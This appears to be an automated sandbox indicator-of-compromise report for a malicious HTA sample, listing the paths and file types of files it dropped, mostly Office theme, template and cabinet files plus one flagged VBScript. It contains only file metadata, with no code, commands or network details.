IOC Report
MSkUffzfPy.hta

loading gif

Files

File Path
Type
Category
Malicious
MSkUffzfPy.hta
HTML document, ASCII text, with very long lines (6957), with CRLF line terminators
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs
ASCII text, with very long lines (708), with CRLF line terminators
dropped
 malicious
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xa05c6d62, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf
TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
dropped
C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
data
dropped
C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{E88C1528-3361-4E98-BC90-C88BCB3C5BB2}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\623-6341-11.docx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703139962058600_6F6325B3-64B6-4D5D-9618-B4D5AE6B3602.log
data
dropped
C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703139962592100_6F6325B3-64B6-4D5D-9618-B4D5AE6B3602.log
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8010.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8010.tmp\ThemePictureAccent.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8026.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8026.tmp\harvardanglia2008officeonline.xsl
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD803A.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD803A.tmp\ConvergingText.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD803B.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD803B.tmp\PictureFrame.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD804B.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD804B.tmp\InterconnectedBlockProcess.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8062.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8062.tmp\mlaseventheditionofficeonline.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8072.tmp\BracketList.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8072.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8084.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8084.tmp\sist02.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD80A7.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80A7.tmp\TabbedArc.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD80B8.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80B8.tmp\chevronaccent.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD80D8.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80D8.tmp\ThemePictureGrid.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD80D9.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80D9.tmp\iso690nmerical.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD80F9.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80F9.tmp\VaryingWidthList.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD80FA.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80FA.tmp\turabian.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD80FB.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80FB.tmp\rings.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD810C.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD810C.tmp\HexagonRadial.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD811E.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD811E.tmp\Element design set.dotx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\TCD813E.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD813E.tmp\Equations.dotx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\TCD814F.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD814F.tmp\iso690.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8150.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8150.tmp\ieee2006officeonline.xsl
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8160.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8160.tmp\TabList.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8161.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8161.tmp\architecture.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8183.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8183.tmp\gosttitle.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8184.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8184.tmp\pictureorgchart.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8195.tmp\Banded.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8195.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD81A6.tmp\Basis.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD81A6.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD81B6.tmp\CircleProcess.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD81B6.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81B7.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81B7.tmp\gb.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD81B8.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81B8.tmp\chicago.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD81DB.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81DB.tmp\ThemePictureAlternatingAccent.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD81FC.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81FC.tmp\Text Sidebar (Annual Report Red and Black design).docx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\TCD821C.tmp\Frame.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD821C.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD822D.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD822D.tmp\gostname.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD824D.tmp\APASixthEditionOfficeOnline.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD824D.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD827E.tmp\Metropolitan.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD827E.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD82EE.tmp\Wood_Type.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD82EE.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD82FF.tmp\View.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD82FF.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8300.tmp\Parallax.thmx
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8300.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8321.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8321.tmp\RadialPictureList.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8341.tmp\Parcel.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8341.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD83A2.tmp\Quotable.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD83A2.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD83E2.tmp\Berlin.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD83E2.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD84B0.tmp\Savon.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD84B0.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD84D0.tmp\Gallery.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD84D0.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8530.tmp\Circuit.thmx
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8530.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD85DE.tmp\Droplet.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD85DE.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8767.tmp\Slate.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8767.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8787.tmp\Damask.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8787.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8883.tmp\Mesh.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8883.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8931.tmp\Main_Event.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8931.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8AF9.tmp\Vapor_Trail.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8AF9.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\TCD8B58.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8B58.tmp\Insight design set.dotx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecxmkvvv.jmg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eja4jrzd.rlk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emeqr1zm.v0h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqgxppgh.5v2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iljpsi0b.euh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnrs02qd.tvs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\cab7FD4.tmp
Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE5.tmp
Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE6.tmp
Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE7.tmp
Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE8.tmp
Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE9.tmp
Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FEA.tmp
Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FEB.tmp
Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FEC.tmp
Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FED.tmp
Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FEE.tmp
Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FFF.tmp
Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8000.tmp
Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8011.tmp
Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8022.tmp
Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8023.tmp
Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8024.tmp
Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8025.tmp
Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8027.tmp
Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8028.tmp
Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8029.tmp
Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab804C.tmp
Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab804D.tmp
Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab804E.tmp
Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab804F.tmp
Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8050.tmp
Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8051.tmp
Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8073.tmp
Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8085.tmp
Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8096.tmp
Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8097.tmp
Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab810D.tmp
Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8162.tmp
Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8173.tmp
Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab81C9.tmp
Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab81CA.tmp
Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab81FB.tmp
Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab824E.tmp
Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab828E.tmp
Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab82CE.tmp
Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8310.tmp
Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8362.tmp
Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab83A1.tmp
Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab846F.tmp
Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab848F.tmp
Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab84F0.tmp
Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab85AE.tmp
Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab86E8.tmp
Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab86E9.tmp
Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8825.tmp
Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab88E2.tmp
Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8A8A.tmp
Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8AD9.tmp
Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\~$3-6341-11.docx
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)
Microsoft OOXML
dropped
